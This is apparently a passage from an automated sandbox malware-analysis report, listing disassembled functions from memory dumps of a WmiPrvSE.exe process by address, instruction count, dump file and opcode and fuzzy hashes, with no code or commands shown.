              Function 00007FFBACF41BB1 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3866ea5e7d0c7469ed2355cc827e00d2b4a51bbf2d2bfbfdced76581a5440315
              • Instruction ID: 97aab76922bf6f5b0fb20602f16ba8f14fe87ef5ac5c4903b9d4e075d71d7ab3
              • Opcode Fuzzy Hash: 3866ea5e7d0c7469ed2355cc827e00d2b4a51bbf2d2bfbfdced76581a5440315
              • Instruction Fuzzy Hash: 581179B09596498FDB49DF28C8995E93BA1FF58304F0142BEE84AD3291EB35A494CB81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46331 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 584e3d3eb24bf37bbc8d5f0658cbede96d97f0a1fcd91f5326b7c662ed16b2a7
              • Instruction ID: 7c0d68c2cd5d9ea8aa1f6c346e5ff328686f4d686951d6236e90ab459b7b2a38
              • Opcode Fuzzy Hash: 584e3d3eb24bf37bbc8d5f0658cbede96d97f0a1fcd91f5326b7c662ed16b2a7
              • Instruction Fuzzy Hash: 0D11AFB4908A8E8FDB89EF78C8992B97BA1FF58311F1005BED809C2292CF35A544C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43B45 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ed24e44789bb20744eeb89d1e2a602962953d902343f14fbf114b8c2828a7d9
              • Instruction ID: 886b1efba4315ee4aebc1f0ab244ca789586775e4313fe344aafcef0bd295379
              • Opcode Fuzzy Hash: 1ed24e44789bb20744eeb89d1e2a602962953d902343f14fbf114b8c2828a7d9
              • Instruction Fuzzy Hash: BD11AFB0819A4E8FDB99EF78C4992B97BA0FF58311F4005BED819C2592CF35A148C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43AA9 Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8e6cc0feecb8e3fed4549af64f33673a85586b811fe9bbaa270c1e7984d6c85
              • Instruction ID: cf2021944e8f5be867ec2d966e2432d721202ca69d83c7502a87c0e177ff1b19
              • Opcode Fuzzy Hash: e8e6cc0feecb8e3fed4549af64f33673a85586b811fe9bbaa270c1e7984d6c85
              • Instruction Fuzzy Hash: 4F21D2B490964E8FDB89EF78C4992B97BB0FF58300F0005BED809C6192CA35A449C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41DBC Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 039639f4a2dcd669346a8d9a5ef3a014755c45caff3f6e38d04b788ebd0524c1
              • Instruction ID: dcc742b9d05090b02d96b7b7bfdc832f090273b5f3bede53be148adac1e2e3ba
              • Opcode Fuzzy Hash: 039639f4a2dcd669346a8d9a5ef3a014755c45caff3f6e38d04b788ebd0524c1
              • Instruction Fuzzy Hash: 1D11E6B484E68D4FEB0ADB70C9696F93BB0EF06300F0540FBD809CB093DA29A549C311
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30D0D Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32b37fe1f473381e9ca380b78250e1915d326c5086352b47da8f0bf03c1337f5
              • Instruction ID: cb40735d4d463c84beb9f77463ef18138cfcec19adbd0e946531b0dc6e5a51a4
              • Opcode Fuzzy Hash: 32b37fe1f473381e9ca380b78250e1915d326c5086352b47da8f0bf03c1337f5
              • Instruction Fuzzy Hash: C211BBB181964DAEEB9ADB78C8593F87BE0EF59310F0004BBC819C6692CE26A448C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF447CA Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7627549abe9c45334b417e4b1212d3a60acf053af942c6866504c30a217c1831
              • Instruction ID: ca7587605210c256cb13da2f7e95a233913b31b6471fd063dfe5026a408a840c
              • Opcode Fuzzy Hash: 7627549abe9c45334b417e4b1212d3a60acf053af942c6866504c30a217c1831
              • Instruction Fuzzy Hash: 1E11A0B4E0995C4FDF90EA78C8897ECBBE1FF69310F5041AAD41DE3242DE35A8858B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF443F9 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac69bc1f1725959d58ff61cbac8777deb39384d6c3a502596636f5c4144eef6c
              • Instruction ID: 9e937c5b94f344de38acc49037199675aa4b97f4e2a265bf690c2e7f8d7d2048
              • Opcode Fuzzy Hash: ac69bc1f1725959d58ff61cbac8777deb39384d6c3a502596636f5c4144eef6c
              • Instruction Fuzzy Hash: CC118EB090968E4FEB4AEB74C8A92B97FA0EF15301F4404BAD80AD61A2DE25A448C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420D8 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c4a040e06d23ff1fae05a686da155d6f6be81e1d8ddc238169cd8619a11491b6
              • Instruction ID: c8e7d4e9e3800781064cf8bada850aaf07b4e24a997123dd8a37fd85649ba678
              • Opcode Fuzzy Hash: c4a040e06d23ff1fae05a686da155d6f6be81e1d8ddc238169cd8619a11491b6
              • Instruction Fuzzy Hash: 100108FA94D55A8BE751AB7CD8991F93B90EF84311F0504BBCE48C6082DB25E45D8780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40561 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39c71de8a619f7d1d501c77110a8bca6889722eea790d9846ee4cf1805847171
              • Instruction ID: ab8501e8258bebf47586730fc98faa7fd2ee9d42b05ab4796232007d9db44875
              • Opcode Fuzzy Hash: 39c71de8a619f7d1d501c77110a8bca6889722eea790d9846ee4cf1805847171
              • Instruction Fuzzy Hash: E011A1B0809A4E9FEB95EF78C49D6BE7BE0FF18301F4004BAD819C6191DB35A554CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30AED Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14afe5b3f1a9db4acef9ddcebb1b61d6a9af65ae2dc43391630e1311757b674e
              • Instruction ID: 8b7220c17b0e234856abbea8026c83d162f7fa803a6030063de11a701a91bc19
              • Opcode Fuzzy Hash: 14afe5b3f1a9db4acef9ddcebb1b61d6a9af65ae2dc43391630e1311757b674e
              • Instruction Fuzzy Hash: 451190B1A0990D8FEB55EB60C885BEEB3A1FF54300F104276C40AD7295CE38A985CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420E8 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 047ec21ff65a2130e95be79e5b40b4bc9445de3ea80c5bf950eda2e067eb00ae
              • Instruction ID: 81410040e2cc9ac0a75015fd9d379b36759b915387cccbd37832b13dd59051bb
              • Opcode Fuzzy Hash: 047ec21ff65a2130e95be79e5b40b4bc9445de3ea80c5bf950eda2e067eb00ae
              • Instruction Fuzzy Hash: A2118FB890890E8EEB89EF78C8992BD77A0FF58304F50057AD81DC21A1CE35A144C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF456F9 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 09d4e906c955b642e8b709fbfbd40d1134669553ab3b177616b602e1005133d3
              • Instruction ID: 91404cfc6f09b306eb7b9ebf595267914b421c81156507de46a5269a87804e7a
              • Opcode Fuzzy Hash: 09d4e906c955b642e8b709fbfbd40d1134669553ab3b177616b602e1005133d3
              • Instruction Fuzzy Hash: FE119EB0D0D68E8FEB52EB78899D2A97BF0EF15311F4505B6D808C71A2EA28A548C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4410D Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 101aa80a0b27e71350da420094a1a6c93fa30aa06f5e0e209a6556746e05dbef
              • Instruction ID: 22b25b207495c50c52958fed7017556e46a995f832e15f6aae9151e21e392e55
              • Opcode Fuzzy Hash: 101aa80a0b27e71350da420094a1a6c93fa30aa06f5e0e209a6556746e05dbef
              • Instruction Fuzzy Hash: BA119DB080964E8FEB9AEB74C8992BA7FE0FF68300F0105BAD41AD6192DE35A544C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4658D Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fd3c2dbf34dea908a52b403b593edbdb5ddd4a293ddda0d43a0daf63997ff50
              • Instruction ID: 4cb9aef0538e00d7ed007f2dda380c78ba22e8bec2e57d7a12efbbba1d25d455
              • Opcode Fuzzy Hash: 7fd3c2dbf34dea908a52b403b593edbdb5ddd4a293ddda0d43a0daf63997ff50
              • Instruction Fuzzy Hash: CE11E3B490964E4FDB59EF34C8A92B97BA0EF58310F4441BED80DC6192DE36A548C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46AD1 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1bb64bb9c4c87597806d0ff18384fa8b698ff4fa7e2d8bb6a82011d3b1c7b2e8
              • Instruction ID: 92bb43a1ccf4e3b74d07045cdfb31cc740c42cf64a6509571c392eacc840dee5
              • Opcode Fuzzy Hash: 1bb64bb9c4c87597806d0ff18384fa8b698ff4fa7e2d8bb6a82011d3b1c7b2e8
              • Instruction Fuzzy Hash: 19117CB490995E9FEB42EB74C98C5AA7BE4FF19301F0044B6D808C70A1DE39E184C760
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42A75 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a110d1ac3144bdb07dcb3d4071750b072dd3b09f5cd3ca6e7c1ccab694a11164
              • Instruction ID: 8d0394d69e4a2777d1cbba06dbb3ae40115aaaa53bcc453de133c5efa0ca2ca0
              • Opcode Fuzzy Hash: a110d1ac3144bdb07dcb3d4071750b072dd3b09f5cd3ca6e7c1ccab694a11164
              • Instruction Fuzzy Hash: AC11A1B4D1954E8FE765EB78C99D2BA7BE0FF14300F4505B6E81CC6092DE24E5488751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4436D Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 068a23d0eab3bc9f5c3357c625bc35d29ae769b321fe2df6c8f9ebcd66b6e36b
              • Instruction ID: 4b90bac8c97b78c974894e8c7880e294cdf66a0ea23811b9e4c1adfbb08f679e
              • Opcode Fuzzy Hash: 068a23d0eab3bc9f5c3357c625bc35d29ae769b321fe2df6c8f9ebcd66b6e36b
              • Instruction Fuzzy Hash: 9C11E0B0918A8E8FDB4AEB74C85D2B97BE1FF18304F0009BAD81AD6192DF35A558C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3BC69 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 92b9cb1cca3807886b8662a0a8a71eff989c569741f8778f7e3dc6c58c604a49
              • Instruction ID: 18fd796cf0204ab3ca3744f202e878b278fba5400f0228a8eae9a3c7f52470cc
              • Opcode Fuzzy Hash: 92b9cb1cca3807886b8662a0a8a71eff989c569741f8778f7e3dc6c58c604a49
              • Instruction Fuzzy Hash: 88115EB090964D9FEB96EB74C8AD1F97BE0FF69301F4004BAD819C6292DE76A944C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF33415 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 96d1402e592a245b426925129bbc6c48a8547b7ec141e63babe986053fb0ec37
              • Instruction ID: b915e73ca4709b0d59b4b31f32d30043e5da4872d32e8f4e8084e10ae3b5ffc6
              • Opcode Fuzzy Hash: 96d1402e592a245b426925129bbc6c48a8547b7ec141e63babe986053fb0ec37
              • Instruction Fuzzy Hash: 8C118EB090965E9FEB9AEF78C8581FD7BA0FF18301F4005BED829C6292DB35A449C700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420E0 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 22cd9073782e8a07bff055e9ecb59247898411ecc17ecad0ef6e30853b19c06d
              • Instruction ID: d2ef2b2d0beb04f4874b9e8f834a69c170ad4330d490ab20428622fa6ad40d27
              • Opcode Fuzzy Hash: 22cd9073782e8a07bff055e9ecb59247898411ecc17ecad0ef6e30853b19c06d
              • Instruction Fuzzy Hash: 1901F5F994D55E8AF762AB78D89E1F93BA0EF84311F0504BBDA08C6082DA25E44D8780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C069 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f002f6936c7259e973a27240ba62cbbb6669ac1f5208a90d373e5e44736d77ad
              • Instruction ID: 63cc6e77d7a794f5e72f9b2c253970c1a4c6d05e12a2c545fa37457fff066987
              • Opcode Fuzzy Hash: f002f6936c7259e973a27240ba62cbbb6669ac1f5208a90d373e5e44736d77ad
              • Instruction Fuzzy Hash: 231102B580968D9FDB8AEF34C4581F93FA0FF59300F1002BAD419C7192CA39A948C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3B895 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 749d607b0bae25d5b1d3d047185ecf067acdcb58c7c6cbe04dfc87f23086e36f
              • Instruction ID: a24fc5ec2e226362981354c551465a9f425ce8f7329c38831ae4880f96b055f2
              • Opcode Fuzzy Hash: 749d607b0bae25d5b1d3d047185ecf067acdcb58c7c6cbe04dfc87f23086e36f
              • Instruction Fuzzy Hash: D1117CB090A64D9FEB99EF78C46D2F97BA0FF18301F0004BED819C6291DA36A545C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF463D5 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 91a877ddef98c7ef9bd340c0a2e6c401b2a77e0322cf6c12bdfbe889f8e0c93c
              • Instruction ID: 29f1f63dafe536d0f353ae5052825cca3ed96a02e1b39593654b3b3452c4a947
              • Opcode Fuzzy Hash: 91a877ddef98c7ef9bd340c0a2e6c401b2a77e0322cf6c12bdfbe889f8e0c93c
              • Instruction Fuzzy Hash: 8401A1B890968E8FEB99DF78C8592B93BA0FF54300F40057AE80CC25A2DB35E548C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46F99 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 96e653f96e7332767fa564436489aa495f201240d7ac874a212733b21a75286b
              • Instruction ID: 7dc391bf582cb835aa2fa533c451d6fb17ac3286ba50237ecdd50e19c32961b4
              • Opcode Fuzzy Hash: 96e653f96e7332767fa564436489aa495f201240d7ac874a212733b21a75286b
              • Instruction Fuzzy Hash: 2C118EB481965D8FEB4ADB74C8991B93BA0FF15311F4004BAE859C6192EA3AA918C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32D61 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d1245028d8804796a223a30ac0baa8140cfeaea2574e600a66dc10280d78b9ba
              • Instruction ID: 2ec292b508e0f3ab2b64da4d1e8560cacadaf15fe3135089e1fac3a9e4441659
              • Opcode Fuzzy Hash: d1245028d8804796a223a30ac0baa8140cfeaea2574e600a66dc10280d78b9ba
              • Instruction Fuzzy Hash: B301DFB0D1965E5FE7A2EB38C44C6E93BE0EF59300F4104B6D828C62A2EE38E5488700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF473E1 Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9ad408c325fcf406a8404d6f0b4c60e7e99a057fde3c63cc35e7e997cc9bb011
              • Instruction ID: 3c1a526bc702f3ac6e487c4ffd60c81573845c59faa869f4c8ce8dafcb88c326
              • Opcode Fuzzy Hash: 9ad408c325fcf406a8404d6f0b4c60e7e99a057fde3c63cc35e7e997cc9bb011
              • Instruction Fuzzy Hash: 9101B1B0809A4ECFDB59DB74C5991B93FA0EF14300F4004BFD80AC61A2DE3AA554C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF305F1 Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cb5a8081e11c311b132fb02a266f12ea776856cdf20ed7057f364959a2cdc15b
              • Instruction ID: 1465b850a15641bda26ce31eb996e79eb32dc900809ce8667b1b70952773e030
              • Opcode Fuzzy Hash: cb5a8081e11c311b132fb02a266f12ea776856cdf20ed7057f364959a2cdc15b
              • Instruction Fuzzy Hash: B701B1F0A1960E5FE392EB78C48D5E97BF0EF98300F4104B6D819C32A6DE38E448CA40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF301D0 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 691dd7c997a1920a780693a6adf794b749ecfe7ac48d2573e0ba71b0eaec6052
              • Instruction ID: 069b4cccae094363012a6a6a6684e3f8abd415e46c7180058975d103bb1b0dbc
              • Opcode Fuzzy Hash: 691dd7c997a1920a780693a6adf794b749ecfe7ac48d2573e0ba71b0eaec6052
              • Instruction Fuzzy Hash: 1B0180B090950D9EDF99EF34C4496FA77A1EF58304F50847AD81EC2290CA76A555CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3A4C9 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 454995c5dcad11a80e8ec486d7d937923b6eeecdb0806977f350526481743508
              • Instruction ID: 322f89a7e476ec252665fc6bd3fb10f5855d3ea6a0f7f78c7759d23715368fe1
              • Opcode Fuzzy Hash: 454995c5dcad11a80e8ec486d7d937923b6eeecdb0806977f350526481743508
              • Instruction Fuzzy Hash: F20180B090A68D5FDB9ADB74C86D1F97BA0EF19301F4504BFD81AC6192DE26A858C710
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46C59 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bbcb6028d5c29ed38b83c30ab9dd95e1c35f60471702ab53c88bc61043d43b8d
              • Instruction ID: 35681f044f968552ac901e695ff5c50024824eba6e679b4b6bda17977b86eefb
              • Opcode Fuzzy Hash: bbcb6028d5c29ed38b83c30ab9dd95e1c35f60471702ab53c88bc61043d43b8d
              • Instruction Fuzzy Hash: 21018FB490E64A9FE752EB78C99D1A93FE0EF59301F4508B6D908C70A2EE29E5488750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32DD9 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dfd23763121217a8bdb28452d71e2c96c3855a327e0bdfe73e95136b403fe9c1
              • Instruction ID: 32f3c7569826a6b94fc7a90abce857a580fdf14675d03c690c236a46c6e2a211
              • Opcode Fuzzy Hash: dfd23763121217a8bdb28452d71e2c96c3855a327e0bdfe73e95136b403fe9c1
              • Instruction Fuzzy Hash: 940184B181E6495FE753EB34C88D1E97FE0EF59301F0505B6D828C71A3DA29E498C751
              Uniqueness

              Uniqueness Score: -1.00%

